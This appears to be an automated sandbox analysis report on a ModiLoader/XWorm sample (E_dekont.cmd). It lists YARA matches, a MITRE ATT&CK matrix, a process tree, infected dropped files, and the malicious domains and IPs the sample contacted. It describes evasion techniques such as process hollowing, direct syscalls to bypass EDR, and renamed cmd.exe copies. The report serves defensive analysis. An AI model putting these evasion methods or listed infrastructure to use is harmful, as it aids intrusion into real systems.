                Source: Yara matchFile source: 30.2.wdmvmswJ.pif.279e5570.11.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e610000.1103.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e6f0000.915.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 30.2.wdmvmswJ.pif.27a02b90.10.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 30.3.wdmvmswJ.pif.244ea0a0.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e770000.1053.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 30.2.wdmvmswJ.pif.265becae.7.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e760000.1115.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e730000.1154.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e7a0000.941.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e710000.927.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 38.2.wdmvmswJ.pif.1eb40000.8.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e790000.1066.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e790000.1064.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e780000.1058.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 38.2.wdmvmswJ.pif.1eb40000.8.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e6f0000.914.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e760000.1093.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e700000.848.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e7a0000.1060.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e700000.919.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e6d0000.1068.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 38.3.wdmvmswJ.pif.1c684410.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e7a0000.865.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e740000.1160.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e710000.845.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 38.2.wdmvmswJ.pif.1e8fecae.7.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 30.2.wdmvmswJ.pif.29240000.13.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e790000.1062.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e710000.846.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 30.2.wdmvmswJ.pif.268b0000.9.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e790000.1067.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e760000.1092.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e740000.1161.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e730000.1155.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e700000.853.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e700000.849.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e620000.1099.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e710000.925.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 30.2.wdmvmswJ.pif.279e6478.12.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 30.2.wdmvmswJ.pif.29240000.13.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e7a0000.921.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e730000.1152.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 38.2.wdmvmswJ.pif.1fd62b90.10.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e620000.1100.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e790000.1061.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e700000.851.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e720000.1148.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 30.2.wdmvmswJ.pif.27a02b90.10.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e620000.1097.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e740000.1162.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e740000.928.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e6b0000.1095.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e700000.918.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e7a0000.942.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e720000.1150.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 30.3.wdmvmswJ.pif.244ea0a0.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e700000.917.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e5f0000.1165.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 38.3.wdmvmswJ.pif.1c684410.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e620000.1101.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e770000.1054.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e6c0000.1163.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e780000.1056.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 38.2.wdmvmswJ.pif.1e8ffbb6.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e6f0000.913.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e750000.1110.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 30.2.wdmvmswJ.pif.268b0f08.8.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e620000.1098.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e730000.1153.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e760000.1002.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e710000.924.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e780000.1057.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 30.2.wdmvmswJ.pif.265becae.7.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e740000.1159.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 38.2.wdmvmswJ.pif.1eb40f08.9.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 30.2.wdmvmswJ.pif.265bfbb6.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e790000.1065.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e610000.1096.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 30.2.wdmvmswJ.pif.265bfbb6.6.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 38.2.wdmvmswJ.pif.1fd62b90.10.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 38.2.wdmvmswJ.pif.1fd45570.12.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e6f0000.843.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e710000.923.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e740000.929.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e770000.1052.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e6c0000.1164.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 38.2.wdmvmswJ.pif.1fd46478.11.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 30.2.wdmvmswJ.pif.268b0000.9.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 38.2.wdmvmswJ.pif.1e8ffbb6.6.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e700000.850.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e7a0000.903.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 30.2.wdmvmswJ.pif.279e6478.12.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e8e0cd8.17.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e700000.847.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e700000.920.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e790000.1063.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 30.2.wdmvmswJ.pif.279e5570.11.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e6f0000.916.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e740000.1158.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e6f0000.844.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e8e0cd8.17.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e7a0000.866.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e7a0000.1059.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.wdmvmswJ.pif.1e770000.1051.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000026.00000002.1848536058.000000001FD45000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001E.00000003.1663470654.00000000244EA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001E.00000002.1777354937.000000002657E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000026.00000002.1848938336.00000000213F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001E.00000002.1798010411.0000000029240000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000026.00000002.1840076965.000000001E8BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000003.1553023677.000000001E8E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001E.00000002.1795060712.00000000279E5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000026.00000002.1840971745.000000001EB40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001E.00000002.1782173123.00000000268B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000026.00000003.1766990632.000000001C684000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Yara detected XWorm
                Source: Yara matchFile source: 00000026.00000002.1842028459.000000001EDB7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000026.00000002.1842028459.000000001ED41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001E.00000002.1782690545.0000000026A57000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: wdmvmswJ.pif PID: 2056, type: MEMORYSTR

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire Infrastructure1
                Valid Accounts                		11
                Windows Management Instrumentation                		2
                LSASS Driver                		1
                Abuse Elevation Control Mechanism                		11
                Disable or Modify Tools                		11
                Input Capture                		1
                System Time Discovery                		1
                Taint Shared Content                		1
                Archive Collected Data                		3
                Ingress Tool Transfer                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts2
                Native API                		1
                DLL Side-Loading                		2
                LSASS Driver                		1
                Deobfuscate/Decode Files or Information                		LSASS Memory1
                Account Discovery                		Remote Desktop Protocol11
                Input Capture                		11
                Encrypted Channel                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain Accounts1
                Shared Modules                		1
                Valid Accounts                		1
                DLL Side-Loading                		1
                Abuse Elevation Control Mechanism                		Security Account Manager1
                System Network Connections Discovery                		SMB/Windows Admin SharesData from Network Shared Drive1
                Non-Standard Port                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal Accounts2
                Command and Scripting Interpreter                		1
                Windows Service                		1
                Valid Accounts                		3
                Obfuscated Files or Information                		NTDS2
                File and Directory Discovery                		Distributed Component Object ModelInput Capture4
                Non-Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud Accounts2
                Service Execution                		1
                Registry Run Keys / Startup Folder                		1
                Access Token Manipulation                		21
                Software Packing                		LSA Secrets36
                System Information Discovery                		SSHKeylogging115
                Application Layer Protocol                		Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts1
                Windows Service                		1
                Timestomp                		Cached Domain Credentials361
                Security Software Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items311
                Process Injection                		1
                DLL Side-Loading                		DCSync141
                Virtualization/Sandbox Evasion                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/Job1
                Registry Run Keys / Startup Folder                		1
                File Deletion                		Proc Filesystem2
                Process Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt432
                Masquerading                		/etc/passwd and /etc/shadow1
                Application Window Discovery                		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                Valid Accounts                		Network Sniffing1
                System Owner/User Discovery                		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
                Access Token Manipulation                		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task141
                Virtualization/Sandbox Evasion                		KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
                Determine Physical LocationsVirtual Private ServerCompromise Hardware Supply ChainUnix ShellSystemd TimersSystemd Timers311
                Process Injection                		GUI Input CapturePermission Groups DiscoveryReplication Through Removable MediaEmail CollectionProxyExfiltration over USBNetwork Denial of Service

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1546600 Sample: E_dekont.cmd Startdate: 01/11/2024 Architecture: WINDOWS Score: 100 84 xccjj.biz 2->84 86 wluwplyh.biz 2->86 88 127 other IPs or domains 2->88 108 Multi AV Scanner detection for domain / URL 2->108 110 Suricata IDS alerts for network traffic 2->110 112 Found malware configuration 2->112 114 16 other signatures 2->114 10 cmd.exe 1 2->10         started        12 Jwsmvmdw.PIF 2->12         started        15 Jwsmvmdw.PIF 2->15         started        17 16 other processes 2->17 signatures3 process4 dnsIp5 21 x.exe 1 7 10->21         started        26 extrac32.exe 8 10->26         started        28 conhost.exe 10->28         started        132 Writes to foreign memory regions 12->132 134 Allocates memory in foreign processes 12->134 136 Sample uses process hollowing technique 12->136 30 wdmvmswJ.pif 12->30         started        32 wdmvmswJ.pif 15->32         started        90 165.160.15.20, 49787, 56276, 56310 CSCUS United States 17->90 92 wxgzshna.biz 17->92 94 3 other IPs or domains 17->94 60 C:\Windows\System32\sppsvc.exe, PE32+ 17->60 dropped 138 Creates files in the system32 config directory 17->138 140 Contains functionality to behave differently if execute on a Russian/Kazak computer 17->140 142 Infects executable files (exe, dll, sys, html) 17->142 144 Found direct / indirect Syscall (likely to bypass EDR) 17->144 file6 signatures7 process8 dnsIp9 102 chichometextiles.com 188.114.97.3, 443, 49706, 49707 CLOUDFLARENETUS European Union 21->102 104 jifai.biz 21->104 72 C:\Users\Public\Libraries\wdmvmswJ.pif, PE32 21->72 dropped 74 C:\Users\Public\Libraries\Jwsmvmdw, data 21->74 dropped 76 C:\Users\Public\Jwsmvmdw.url, MS 21->76 dropped 124 Drops PE files with a suspicious file extension 21->124 126 Writes to foreign memory regions 21->126 128 Allocates memory in foreign processes 21->128 130 2 other signatures 21->130 34 wdmvmswJ.pif 4 21->34         started        39 cmd.exe 1 21->39         started        41 esentutl.exe 2 21->41         started        43 svchost.exe 21->43         started        78 C:\Users\user\AppData\Local\Temp\x.exe, PE32 26->78 dropped file10 signatures11 process12 dnsIp13 96 lpuegx.biz 82.112.184.197, 49728, 49732, 49733 FIRST_LINE-SP_FOR_B2B_CUSTOMERSUPSTREAMSRU Russian Federation 34->96 98 62.60.190.120, 49727, 7923 ASLINE-AS-APASLINELIMITEDHK Iran (ISLAMIC Republic Of) 34->98 100 18 other IPs or domains 34->100 62 C:\Windows\System32\wbengine.exe, PE32+ 34->62 dropped 64 C:\Windows\System32\wbem\WmiApSrv.exe, PE32+ 34->64 dropped 66 C:\Windows\System32\vds.exe, PE32+ 34->66 dropped 70 141 other malicious files 34->70 dropped 116 Detected unpacking (changes PE section rights) 34->116 118 Detected unpacking (overwrites its own PE header) 34->118 120 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 34->120 122 3 other signatures 34->122 45 esentutl.exe 2 39->45         started        49 alpha.pif 39->49         started        51 esentutl.exe 2 39->51         started        55 6 other processes 39->55 68 C:\Users\Public\Libraries\Jwsmvmdw.PIF, PE32 41->68 dropped 53 conhost.exe 41->53         started        file14 signatures15 process16 file17 80 C:\Users\Public\alpha.pif, PE32 45->80 dropped 146 Drops PE files to the user root directory 45->146 148 Drops PE files with a suspicious file extension 45->148 150 Drops or copies cmd.exe with a different name (likely to bypass HIPS) 45->150 57 xpha.pif 49->57         started        82 C:\Users\Public\xpha.pif, PE32 51->82 dropped signatures18 process19 dnsIp20 106 127.0.0.1 unknown unknown 57->106

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                E_dekont.cmd45%ReversingLabsWin32.Trojan.ModiLoader
                E_dekont.cmd47%VirustotalBrowse

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Program Files (x86)\AutoIt3\Au3Info.exe100%AviraW32/Infector.Gen
                C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe100%AviraW32/Infector.Gen
                C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe100%AviraW32/Infector.Gen
                C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe100%AviraW32/Infector.Gen
                C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe100%AviraW32/Infector.Gen
                C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe100%AviraW32/Infector.Gen
                C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe100%AviraW32/Infector.Gen
                C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe100%AviraW32/Infector.Gen
                C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe100%AviraW32/Infector.Gen
                C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe100%AviraW32/Infector.Gen
                C:\Program Files (x86)\AutoIt3\Au3Check.exe100%AviraW32/Infector.Gen
                C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe100%AviraW32/Infector.Gen
                C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe100%AviraW32/Infector.Gen
                C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exe100%AviraW32/Infector.Gen
                C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe100%AviraW32/Infector.Gen
                C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe100%AviraW32/Infector.Gen
                C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe100%AviraW32/Infector.Gen
                C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe100%AviraW32/Infector.Gen
                C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe100%AviraW32/Infector.Gen
                C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe100%AviraW32/Infector.Gen
                C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe100%AviraW32/Infector.Gen
                C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe100%AviraW32/Infector.Gen
                C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe100%AviraW32/Infector.Gen
                C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe100%AviraW32/Infector.Gen
                C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe100%AviraW32/Infector.Gen
                C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe100%AviraW32/Infector.Gen
                C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe100%AviraW32/Infector.Gen
                C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe100%AviraW32/Infector.Gen
                C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe100%AviraW32/Infector.Gen
                C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe100%AviraW32/Infector.Gen
                C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe100%AviraW32/Infector.Gen
                C:\Program Files (x86)\AutoIt3\Au3Info.exe100%Joe Sandbox ML
                C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe100%Joe Sandbox ML
                C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe100%Joe Sandbox ML
                C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe100%Joe Sandbox ML
                C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe100%Joe Sandbox ML
                C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe100%Joe Sandbox ML
                C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe100%Joe Sandbox ML
                C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe100%Joe Sandbox ML
                C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe100%Joe Sandbox ML
                C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe100%Joe Sandbox ML
                C:\Program Files (x86)\AutoIt3\Au3Check.exe100%Joe Sandbox ML
                C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe100%Joe Sandbox ML
                C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe100%Joe Sandbox ML
                C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exe100%Joe Sandbox ML
                C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe100%Joe Sandbox ML
                C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe100%Joe Sandbox ML
                C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe100%Joe Sandbox ML
                C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe100%Joe Sandbox ML
                C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe100%Joe Sandbox ML
                C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe100%Joe Sandbox ML
                C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe100%Joe Sandbox ML
                C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe100%Joe Sandbox ML
                C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe100%Joe Sandbox ML
                C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe100%Joe Sandbox ML
                C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe100%Joe Sandbox ML
                C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe100%Joe Sandbox ML
                C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe100%Joe Sandbox ML
                C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe100%Joe Sandbox ML
                C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe100%Joe Sandbox ML
                C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe100%Joe Sandbox ML
                C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe100%Joe Sandbox ML

                Unpacked PE Files

                No Antivirus matches

                Domains

                SourceDetectionScannerLabelLink
                uaafd.biz12%VirustotalBrowse
                xnxvnn.biz14%VirustotalBrowse
                nlscndwp.biz11%VirustotalBrowse
                vjaxhpbji.biz14%VirustotalBrowse

                URLs

                No Antivirus matches

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                uaafd.biz
                		3.254.94.185
                		truefalse
                xnxvnn.biz
                		13.251.16.150
                		truefalse
                nlscndwp.biz
                		54.244.188.177
                		truetrue
                vjaxhpbji.biz
                		82.112.184.197
                		truetrue
                ytctnunms.biz
                		3.94.10.34
                		truefalse
                  qncdaagct.biz
                  		47.129.31.212
                  		truefalse
                    ctdtgwag.biz
                    		3.94.10.34
                    		truefalse
                      tbjrpv.biz
                      		34.246.200.160
                      		truefalse
                        kcyvxytog.biz
                        		18.208.156.248
                        		truefalse
                          ereplfx.biz
                          		18.246.231.120
                          		truetrue
                            apzzls.biz
                            		34.211.97.45
                            		truefalse
                              sxmiywsfv.biz
                              		13.251.16.150
                              		truefalse
                                pgfsvwx.biz
                                		18.208.156.248
                                		truefalse
                                  przvgke.biz
                                  		172.234.222.138
                                  		truefalse
                                    ocsvqjg.biz
                                    		3.254.94.185
                                    		truefalse
                                      ecxbwt.biz
                                      		54.244.188.177
                                      		truetrue
                                        bghjpy.biz
                                        		34.211.97.45
                                        		truefalse
                                          damcprvgv.biz
                                          		18.208.156.248
                                          		truefalse
                                            gnqgo.biz
                                            		18.208.156.248
                                            		truefalse
                                              tltxn.biz
                                              		18.208.156.248
                                              		truefalse
                                                deoci.biz
                                                		18.208.156.248
                                                		truefalse
                                                  krnsmlmvd.biz
                                                  		47.129.31.212
                                                  		truefalse
                                                    uevrpr.biz
                                                    		18.246.231.120
                                                    		truetrue
                                                      hagujcj.biz
                                                      		18.208.156.248
                                                      		truefalse
                                                        bumxkqgxu.biz
                                                        		44.221.84.105
                                                        		truefalse
                                                          yhqqc.biz
                                                          		34.211.97.45
                                                          		truefalse
